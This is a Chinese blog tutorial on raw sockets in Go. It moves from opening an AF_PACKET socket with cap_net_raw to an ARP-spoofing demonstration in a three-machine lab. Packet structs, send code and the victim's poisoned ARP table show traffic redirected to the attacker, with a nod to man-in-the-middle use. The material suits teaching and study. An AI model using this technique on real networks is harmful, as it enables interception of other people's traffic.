开发笔记:Go原生socket由浅入深

篇首语：本文由编程笔记#小编为大家整理，主要介绍了Go 原生socket由浅入深相关的知识，希望对你有一定的参考价值。

Linux提供了裸socket功能，允许您直接创建一个裸L3/L2数据包，绕过OS socket生成的协议头。这意味着您可以从头开始直接生成自己的链路层或IP层数据包，对检测网络流量或从头开始创建数据包来说这是非常有用的功能

可以使用SOCK_RAW socket类型（这要求进程具有CAP_NET_RAW功能或以root用户身份运行），使用socket()syscall在Linux上使用裸socket。 Go无法通过net包支持raw socket，但是syscalls可以通过syscall包获得

我们来看一个快速程序来打开一个裸socket

package main;
import (
"fmt"
"syscall"
)
func main() {
 // Socket is defined as:
 // func Socket(domain, typ, proto int) (fd int, err error)
 // Domain specifies the protocol family to be used - this should be AF_PACKET
 // to indicate we want the low level packet interface
 // Type specifies the semantics of the socket
 // Protocol specifies the protocol to use - kept here as ETH_P_ALL to
 // indicate all protocols over Ethernet
 fd, err:= syscall.Socket(syscall.AF_PACKET, syscall.SOCK_RAW,
                 syscall.ETH_P_ALL)
 if (err != nil) {
   fmt.Println("Error: " + err.Error())
   return;
 }
 fmt.Println("Obtained fd ", fd)
 defer syscall.Close(fd)
 // Do something with fd here
}

毫不奇怪，程序失败，出现访问错误

go build raw.go ~
~/etc/gocode/raw$ ./raw
Error: operation not permitted

这里有两个选项：以root运行该程序，或者使用setcap将该功能授予可执行文件：

sudo setcap cap_net_raw=ep raw
~/etc/gocode/raw$ getcap raw
raw = cap_net_raw+ep
~/etc/gocode/raw$ ./raw
Obtained fd  3

使用Raw Sockets进行无偿ARP请求

cat /proc/net/arp
IP address       HW type     Flags       HW address            Mask     Device
10.10.10.1         0x1         0x2         0a:00:27:00:00:01     *        eth0

默认情况下，Linux忽略对不存在于ARP表中设备的所有无偿请求，但是它接受表中已经存在的IP的请求，这可能允许我们将针对特定IP的流量重定向到任何未选择的设备

我们在Go中编写一个程序来利用裸socket将ARP更新发送到通过以太网连接的设备

Setup

我们考虑在本地局域网连接的3台设备的设置：位于10.10.10.1（攻击者）的机器A，10.10.10.2（受害者）和10.10.10.3，这是要发送数据的原始机器

最初，机器B可以访问A和C，如ARP表所示：

ping 10.10.10.3 -c 3
PING 10.10.10.3 (10.10.10.3) 56(84) bytes of data.
64 bytes from 10.10.10.3: icmp_req=1 ttl=64 time=0.786 ms
64 bytes from 10.10.10.3: icmp_req=2 ttl=64 time=2.39 ms
64 bytes from 10.10.10.3: icmp_req=3 ttl=64 time=0.922 ms
--- 10.10.10.3 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2005ms
rtt min/avg/max/mdev = 0.786/1.367/2.394/0.728 ms
10.10.10.2@debian:~$ cat /proc/net/arp
IP address       HW type     Flags       HW address            Mask     Device
10.10.10.3       0x1         0x2         08:00:27:88:09:4b     *        eth0
10.10.10.1       0x1         0x2         0a:00:27:00:00:01     *        eth0

组装 packet

在裸socket中，我们提供的数据包将直接传递给设备驱动程序。 因此，我们需要在较底层协议帧（以太网）中包装我们的ARP数据包

给了我们包的结构：

这可以很容易地使用CGo中的一个结构体中表示：

typedef struct __attribute__((packed))
{
   char dest[6];
   char sender[6];
   uint16_t protocolType;
} EthernetHeader;
typedef struct __attribute__((packed))
{
   uint16_t hwType;
   uint16_t protoType;
   char hwLen;
   char protocolLen;
   uint16_t oper;
   char SHA[6];
   char SPA[4];
   char THA[6];
   char TPA[4];
} ArpPacket;
typedef struct __attribute__((packed))
{
   EthernetHeader eth;
   ArpPacket arp;
} EthernetArpPacket;

我们可以填写数据包的所有字段（请注意，必须按照Go Wiki的建议从CGo完成）：

Sending the payload

打开raw socket:

fd, err := syscall.Socket(syscall.AF_PACKET, syscall.SOCK_RAW, syscall.ETH_P_ALL)
if err != nil {
   fmt.Println("Error: " + err.Error())
   return
}
fmt.Println("Obtained fd ", fd)
defer syscall.Close(fd)

分配并准备数据包，并使用Sendto系统调用程序将其发送到机器B:

packet := C.GoBytes(unsafe.Pointer(C.FillRequestPacketFields(iface_cstr, ip_cstr)),
                   C.int(size))
var addr syscall.SockaddrLinklayer
addr.Protocol = syscall.ETH_P_ARP
addr.Ifindex = interf.Index
addr.Hatype = syscall.ARPHRD_ETHER
// Send the packet
err = syscall.Sendto(fd, packet, 0, &addr)

发送数据包后，看看机器B的ARP表：

cat /proc/net/arp
IP address       HW type     Flags       HW address            Mask     Device
10.10.10.3       0x1         0x2         0a:00:27:00:00:01     *        eth0
10.10.10.1       0x1         0x2         0a:00:27:00:00:01     *        eth0
10.10.10.2@debian:~$ ping 10.10.10.3
PING 10.10.10.3 (10.10.10.3) 56(84) bytes of data.
From 10.10.10.1: icmp_seq=2 Redirect Host(New nexthop: 10.10.10.3)
From 10.10.10.1: icmp_seq=3 Redirect Host(New nexthop: 10.10.10.3)
From 10.10.10.1: icmp_seq=4 Redirect Host(New nexthop: 10.10.10.3)
From 10.10.10.1: icmp_seq=5 Redirect Host(New nexthop: 10.10.10.3)
From 10.10.10.1: icmp_seq=6 Redirect Host(New nexthop: 10.10.10.3)
From 10.10.10.1: icmp_seq=8 Redirect Host(New nexthop: 10.10.10.3)
64 bytes from 10.10.10.3: icmp_req=9 ttl=64 time=0.147 ms
64 bytes from 10.10.10.3: icmp_req=10 ttl=64 time=3.94 ms

我们可以看到，我们已经成功地让B机器相信机器A已经改变了它的位置 - 我们可以看到机器A（10.10.10.1）实际上正在接收到用于机器C（10.10.10.3）的数据包：

在这种情况下，我们不处理由机器A接收（原本由机器C接接收）的数据包，因此它不断响应ICMP重定向，直到机器B终于重新发送机器C的ARP请求。ARP请求的响应，也是相当琐碎的回应报文，也可以进行某种形式的中间人攻击。

整个程序在https://gist.github.com/PollenPolle/ada4d123a4579f3e22f2c5e30e6f4a02